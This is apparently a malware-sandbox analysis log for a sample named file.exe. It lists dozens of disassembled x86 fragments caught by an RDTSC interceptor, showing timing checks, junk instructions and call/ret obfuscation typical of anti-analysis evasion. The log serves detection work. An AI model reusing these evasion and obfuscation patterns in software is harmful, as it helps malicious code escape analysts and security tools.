                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56D82 second address: E56D86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E58010 second address: E5801A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F47DD40FB76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E590DE second address: E59104 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F47DCFB8A36h 0x00000009 jmp 00007F47DCFB8A3Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007F47DCFB8A3Ch 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E59D4A second address: E59D7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, dword ptr [ebp+122D2EF6h] 0x00000013 push 00000000h 0x00000015 sub di, FB54h 0x0000001a push 00000000h 0x0000001c adc bx, 2800h 0x00000021 sub ebx, dword ptr [ebp+122D2CE2h] 0x00000027 push eax 0x00000028 push ecx 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E59ED0 second address: E59ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E59ED4 second address: E59EDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F47DD40FB76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5BDE0 second address: E5BE20 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47DCFB8A36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e stc 0x0000000f or dword ptr [ebp+122D2F6Dh], esi 0x00000015 push 00000000h 0x00000017 call 00007F47DCFB8A3Fh 0x0000001c and bh, 0000003Ch 0x0000001f pop ebx 0x00000020 push 00000000h 0x00000022 mov dword ptr [ebp+122D2A90h], ecx 0x00000028 xchg eax, esi 0x00000029 pushad 0x0000002a push esi 0x0000002b pushad 0x0000002c popad 0x0000002d pop esi 0x0000002e push eax 0x0000002f push edx 0x00000030 jc 00007F47DCFB8A36h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5DEA2 second address: E5DEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D02E second address: E5D032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5ED26 second address: E5ED2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5ED2A second address: E5ED30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E60E4D second address: E60EAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F47DD40FB78h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 js 00007F47DD40FB82h 0x0000002b jmp 00007F47DD40FB7Ch 0x00000030 push 00000000h 0x00000032 pushad 0x00000033 mov dword ptr [ebp+12449A59h], edi 0x00000039 popad 0x0000003a push 00000000h 0x0000003c cmc 0x0000003d xchg eax, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E60EAF second address: E60EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E60EB4 second address: E60EB9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E60EB9 second address: E60EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E60EC6 second address: E60ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E60ECC second address: E60ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E61EAD second address: E61EB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E61EB3 second address: E61F24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F47DCFB8A38h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007F47DCFB8A38h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 mov bx, ax 0x00000047 mov di, 56C5h 0x0000004b push 00000000h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E61F24 second address: E61F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DD40FB80h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E61F39 second address: E61F3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E62E8E second address: E62EA4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F47DD40FB76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F47DD40FB7Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E62EA4 second address: E62EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E62EA8 second address: E62EB2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F47DD40FB7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E61097 second address: E610A7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F47DCFB8A36h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E62EB2 second address: E62F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F47DD40FB78h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 push 00000000h 0x00000023 and ebx, dword ptr [ebp+122D3A3Dh] 0x00000029 call 00007F47DD40FB87h 0x0000002e sub dword ptr [ebp+122D1DE9h], edx 0x00000034 pop edi 0x00000035 push 00000000h 0x00000037 push ebx 0x00000038 jnl 00007F47DD40FB7Bh 0x0000003e mov edi, 12C9C4F1h 0x00000043 pop edi 0x00000044 xchg eax, esi 0x00000045 pushad 0x00000046 push ebx 0x00000047 push esi 0x00000048 pop esi 0x00000049 pop ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c push edx 0x0000004d pop edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E610A7 second address: E610AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E610AB second address: E610B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E61173 second address: E6118C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47DCFB8A45h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5EF0F second address: E5EF13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5EF13 second address: E5EF19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E63E0F second address: E63E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jo 00007F47DD40FB89h 0x00000011 jmp 00007F47DD40FB83h 0x00000016 nop 0x00000017 jmp 00007F47DD40FB85h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007F47DD40FB78h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 add dword ptr [ebp+122D3A0Fh], ecx 0x0000003e push 00000000h 0x00000040 mov dword ptr [ebp+122D2A58h], ecx 0x00000046 xchg eax, esi 0x00000047 jbe 00007F47DD40FB82h 0x0000004d jnl 00007F47DD40FB7Ch 0x00000053 push eax 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 pop eax 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E620C3 second address: E620CC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E65278 second address: E65282 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F47DD40FB76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E65282 second address: E6529D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47DCFB8A47h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6867E second address: E68682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E68682 second address: E686AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F47DCFB8A3Ah 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 jp 00007F47DCFB8A36h 0x0000001c popad 0x0000001d jc 00007F47DCFB8A38h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E66194 second address: E661AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F47DD40FB7Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E686AB second address: E686C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47DCFB8A42h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E686C1 second address: E686C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E708EC second address: E708F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E708F0 second address: E7090D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB83h 0x00000007 jg 00007F47DD40FB76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7090D second address: E70913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70913 second address: E70919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6FFE8 second address: E6FFEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6FFEC second address: E7000B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F47DD40FB81h 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70176 second address: E7018C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F47DCFB8A36h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F47DCFB8A36h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7018C second address: E70192 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E702D2 second address: E702DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F47DCFB8A36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E702DE second address: E702E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E702E3 second address: E7032D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F47DCFB8A60h 0x00000008 jnp 00007F47DCFB8A3Eh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7032D second address: E70333 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFBC98 second address: DFBC9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFBC9E second address: DFBCA4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7CDDF second address: E7CDFA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47DCFB8A43h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7C116 second address: E7C12E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F47DD40FB7Eh 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7C444 second address: E7C465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F47DCFB8A4Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7C59F second address: E7C5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DD40FB83h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47DD40FB88h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7C5D1 second address: E7C5D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7C5D5 second address: E7C5DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7C5DF second address: E7C5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7C5E3 second address: E7C5FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB86h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E80F07 second address: E80F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E80F0D second address: E80F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E87CBF second address: E87CC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E87CC5 second address: E87CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86AA1 second address: E86AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86AAA second address: E86AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86C18 second address: E86C1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86C1E second address: E86C22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86D48 second address: E86D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jp 00007F47DCFB8A3Ch 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86D5B second address: E86D6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB7Dh 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8716E second address: E87177 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E875E7 second address: E87608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DD40FB82h 0x00000009 jmp 00007F47DD40FB7Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B262 second address: E4B268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B53D second address: E4B541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B541 second address: E4B564 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F47DCFB8A42h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B564 second address: CA1C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push dword ptr [ebp+122D1711h] 0x0000000d add dword ptr [ebp+122D2B90h], edx 0x00000013 call dword ptr [ebp+122D2B9Bh] 0x00000019 pushad 0x0000001a jmp 00007F47DD40FB7Eh 0x0000001f stc 0x00000020 xor eax, eax 0x00000022 mov dword ptr [ebp+122D2A10h], ebx 0x00000028 mov edx, dword ptr [esp+28h] 0x0000002c cmc 0x0000002d mov dword ptr [ebp+122D2F36h], eax 0x00000033 pushad 0x00000034 jmp 00007F47DD40FB88h 0x00000039 jnp 00007F47DD40FB78h 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 mov dword ptr [ebp+122D2A10h], eax 0x00000048 mov esi, 0000003Ch 0x0000004d sub dword ptr [ebp+122D3984h], ebx 0x00000053 add esi, dword ptr [esp+24h] 0x00000057 sub dword ptr [ebp+122D2B79h], edx 0x0000005d cmc 0x0000005e lodsw 0x00000060 mov dword ptr [ebp+122D3984h], edi 0x00000066 add eax, dword ptr [esp+24h] 0x0000006a jl 00007F47DD40FB7Ch 0x00000070 or dword ptr [ebp+122D1A7Ch], eax 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a jnl 00007F47DD40FB84h 0x00000080 nop 0x00000081 jnc 00007F47DD40FB84h 0x00000087 push eax 0x00000088 pushad 0x00000089 push eax 0x0000008a push edx 0x0000008b jmp 00007F47DD40FB80h 0x00000090 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B68D second address: E4B694 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B694 second address: E4B6DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a jmp 00007F47DD40FB80h 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 jbe 00007F47DD40FB76h 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push edx 0x00000020 jnl 00007F47DD40FB78h 0x00000026 pop edx 0x00000027 mov eax, dword ptr [eax] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e jmp 00007F47DD40FB7Bh 0x00000033 popad 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B6DB second address: E4B6FB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007F47DCFB8A36h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F47DCFB8A3Eh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B6FB second address: E4B786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [ebp+122D3B06h], edx 0x00000010 call 00007F47DD40FB79h 0x00000015 jmp 00007F47DD40FB87h 0x0000001a push eax 0x0000001b jmp 00007F47DD40FB89h 0x00000020 mov eax, dword ptr [esp+04h] 0x00000024 jmp 00007F47DD40FB80h 0x00000029 mov eax, dword ptr [eax] 0x0000002b jmp 00007F47DD40FB80h 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F47DD40FB7Fh 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B87E second address: E4B89C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c popad 0x0000000d xchg eax, esi 0x0000000e mov edi, dword ptr [ebp+122D2DFEh] 0x00000014 push eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jp 00007F47DCFB8A36h 0x0000001e rdtsc
